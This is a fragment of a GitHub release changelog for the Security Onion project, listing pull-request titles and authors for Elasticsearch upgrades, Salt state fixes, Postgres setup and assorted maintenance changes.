<li>License Link to dev by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TOoSmOotH/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TOoSmOotH">@TOoSmOotH</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4212329179" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15725" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15725/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15725">#15725</a></li>
<li>ES 9.3.2 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4213832974" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15727" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15727/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15727">#15727</a></li>
<li>foxtrot version by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4214413821" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15728" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15728/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15728">#15728</a></li>
<li>filestream integration policy updates by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4219040774" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15733" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15733/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15733">#15733</a></li>
<li>ensure max-files is 1 at minimum by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/m0duspwnens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/m0duspwnens">@m0duspwnens</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4226886845" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15741" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15741/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15741">#15741</a></li>
<li>define options in annotation files by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/m0duspwnens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/m0duspwnens">@m0duspwnens</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4232951289" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15745" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15745/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15745">#15745</a></li>
<li>Assistant: charsPerTokenEstimate by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mc-wright/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mc-wright">@mc-wright</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4227330893" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15742" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15742/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15742">#15742</a></li>
<li>rework elasticsearch index template generation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4235083618" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15751" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15751/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15751">#15751</a></li>
<li>initialize vars by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4235533659" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15754" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15754/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15754">#15754</a></li>
<li>rework elasticsearch template load script -- for core templates by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4244051092" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15761" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15761/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15761">#15761</a></li>
<li>only append "-mappings" to component template names as needed by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4245747616" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15762" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15762/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15762">#15762</a></li>
<li>start loading addon integration index templates by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4246672726" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15763" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15763/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15763">#15763</a></li>
<li>elasticsearch ilm policy load script by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4256107957" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15764" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15764/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15764">#15764</a></li>
<li>3/dev by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4256116989" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15765" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15765/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15765">#15765</a></li>
<li>support minion node descriptions containing spaces by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jertel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jertel">@jertel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4257321022" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15766" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15766/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15766">#15766</a></li>
<li>ES 9.3.3 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4257547731" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15768" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15768/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15768">#15768</a></li>
<li>enable elastic agent patch release for 9.3.3 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4257990414" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15770" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15770/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15770">#15770</a></li>
<li>Improve test scenario for node descriptions by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jertel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jertel">@jertel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4257910191" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15769" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15769/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15769">#15769</a></li>
<li>soup to 3.1.0 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4264444049" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15772" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15772/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15772">#15772</a></li>
<li>check for addon-index templates dir before attempting to load addon i… by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4265500042" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15775" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15775/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15775">#15775</a></li>
<li>ES 9.3.3 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4271410472" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15776" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15776/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15776">#15776</a></li>
<li>supress noisy warning from ES 9.3.3 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4278114532" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15780" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15780/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15780">#15780</a></li>
<li>add wait_for_so-elasticsearch state and split elasticsearch cluster c… by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4284939323" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15786" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15786/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15786">#15786</a></li>
<li>fix template annotation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jertel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jertel">@jertel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4298690393" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15797" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15797/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15797">#15797</a></li>
<li>more error handling during image updates by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jertel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jertel">@jertel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4303221316" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15803" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15803/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15803">#15803</a></li>
<li>urlencode elasticsearch version by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4304726235" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15807" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15807/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15807">#15807</a></li>
<li>postgres follow-ups: fan manager cred + so-yaml.py replace fix by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TOoSmOotH/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TOoSmOotH">@TOoSmOotH</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4304676160" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15806" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15806/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15806">#15806</a></li>
<li>monitor raid for vms by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/m0duspwnens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/m0duspwnens">@m0duspwnens</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4302443415" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15800" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15800/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15800">#15800</a></li>
<li>Fix soup by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TOoSmOotH/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TOoSmOotH">@TOoSmOotH</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4189154174" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15712" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15712/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15712">#15712</a></li>
<li>split up Elastic Fleet state by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312847708" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15813" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15813/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15813">#15813</a></li>
<li>numeric test description by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jertel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jertel">@jertel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4322814229" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15822" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15822/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15822">#15822</a></li>
<li>typo by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4323572855" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15823" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15823/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15823">#15823</a></li>
<li>fix reinstall issue with salt by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/m0duspwnens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/m0duspwnens">@m0duspwnens</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4324188260" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15824" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15824/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15824">#15824</a></li>
<li>readonly soc and kratos enabled by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/m0duspwnens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/m0duspwnens">@m0duspwnens</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4324697539" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15828" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15828/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15828">#15828</a></li>
<li>heavynode should run es cluster state by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4324689972" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15826" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15826/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15826">#15826</a></li>
<li>fix reinstall by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/m0duspwnens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/m0duspwnens">@m0duspwnens</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4325299514" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15829" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15829/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15829">#15829</a></li>
<li>exclude more transform job errors by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4338544976" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15833" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15833/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15833">#15833</a></li>
<li>fix sominion_setup reactor by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/m0duspwnens/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/m0duspwnens">@m0duspwnens</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343176436" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15835" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15835/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15835">#15835</a></li>
<li>Add so-postgres Salt states and infrastructure by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TOoSmOotH/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TOoSmOotH">@TOoSmOotH</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4233980281" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15749" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15749/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15749">#15749</a></li>
<li>check current fleet policy cert against cert on disk by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345399515" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15837" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15837/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15837">#15837</a></li>
<li>Fix/docker refresh multiarch pull by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TOoSmOotH/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TOoSmOotH">@TOoSmOotH</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345505362" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15838" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15838/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15838">#15838</a></li>
<li>drop postgres module from soc defaults injection by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TOoSmOotH/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TOoSmOotH">@TOoSmOotH</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345784371" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15839" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15839/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15839">#15839</a></li>
<li>Open postgres in DOCKER-USER firewall everywhere influxdb is open by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TOoSmOotH/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TOoSmOotH">@TOoSmOotH</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350651443" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15840" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15840/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15840">#15840</a></li>
<li>so-elastic-fleet-outputs-update now checks for cert drift. Remove run… by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352476100" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15842" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15842/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15842">#15842</a></li>
<li>update default elastic agent logging level to warning by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354117407" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15844" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15844/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15844">#15844</a></li>
<li>reauthorize unhealthy transform jobs using kibana 9.3.3 auth flow by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365827767" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15851" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15851/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15851">#15851</a></li>
<li>fleet package registry health check by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4377890623" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15857" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15857/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15857">#15857</a></li>
<li>Fix unsafe PyYAML load in filecheck by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TOoSmOotH/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TOoSmOotH">@TOoSmOotH</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4378045633" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15858" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15858/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15858">#15858</a></li>
<li>Ensure python3-pyyaml is installed before continuing setup by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TOoSmOotH/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TOoSmOotH">@TOoSmOotH</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358815276" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15846" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15846/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15846">#15846</a></li>
<li>update grok type conversion to convert processor by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/reyesj2/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/reyesj2">@reyesj2</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4386361775" data-permission-text="Title is private" data-url="https://github.com/Security-Onion-Solutions/securityonion/issues/15864" data-hovercard-type="pull_request" data-hovercard-url="/Security-Onion-Solutions/securityonion/pull/15864/hovercard" href="https://github.com/Security-Onion-Solutions/securityonion/pull/15864">#15864</a></li>
